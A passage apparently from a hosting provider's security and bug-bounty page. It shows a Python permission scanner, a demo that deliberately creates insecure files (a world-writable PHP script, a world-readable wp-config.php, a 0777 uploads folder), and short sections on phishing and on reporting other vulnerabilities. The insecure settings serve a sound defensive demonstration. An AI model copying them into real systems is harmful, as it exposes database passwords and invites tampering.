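            except OSError:
                continue
            mode = st.st_mode
            if stat.S_ISLNK(mode):
                continue
            rel = os.path.relpath(path, root)
            # A world-writable directory is acceptable only with the sticky bit (like /tmp).
            if mode & stat.S_IWOTH and not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX):
                findings.append((rel, "world-writable"))
            if name in SECRET_NAMES and mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append((rel, "secret readable by group/others"))
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                findings.append((rel, "setuid binary"))
    return sorted(findings)


def build_demo_tree() -> str:
    """Constructs a small hosting-account layout with deliberate mistakes."""
    root = tempfile.mkdtemp(prefix="permdemo-")

    def write(rel: str, mode: int) -> None:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("x")
        os.chmod(path, mode)

    write("public_html/index.html", 0o644)      # fine: public content
    write("public_html/uploads.php", 0o666)     # world-writable script
    write("public_html/wp-config.php", 0o644)   # database password readable by everyone
    write(".env", 0o600)                        # fine: owner only
    os.chmod(os.path.join(root, "public_html"), 0o755)
    uploads = os.path.join(root, "public_html", "uploads")
    os.makedirs(uploads, exist_ok=True)
    os.chmod(uploads, 0o777)                    # world-writable directory, no sticky bit
    return root
```

On shared hosting the "others" bit is what matters most: every other account on the same machine is an "other", so a readable `wp-config.php` hands its database password to all of them.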


11. Phishing Attacks

Imagine receiving a message that appears to be from your bank, asking for your password. Phishing attacks try to trick you into revealing sensitive information. If successful, attackers can steal your login credentials, financial details, or even take control of your accounts.


How do we keep your information safe?


  • Security filters: We have advanced systems to detect and block suspicious phishing emails and websites.
  • User education: We regularly educate our users about phishing tactics and how to identify them.
  • Double-checking: We encourage users to be cautious and verify the sender's identity before clicking on links or entering information.

By reporting phishing attempts that impersonate us, you help us develop even stronger defenses against these sneaky attacks. Remember, vigilance is key to staying safe online!


12. Other Vulnerabilities

We know there's more to security than just ticking a list of boxes. That's why we reward creative thinking when it comes to finding vulnerabilities! Even if it's not explicitly mentioned, if you discover a bug that:


  • Grants users more power than they should have (privilege escalation)
  • Makes things behave strangely, potentially affecting user data (unexpected behavior)
  • Puts user information at risk (integrity or confidentiality impact)

...then we want to hear about it!


We understand we can't offer the biggest payouts, but we deeply value the contribution of every security researcher who helps us build a stronger platform. Your skills and dedication truly deserve a tip of the hat!

Found something offbeat? Don't hesitate to share it!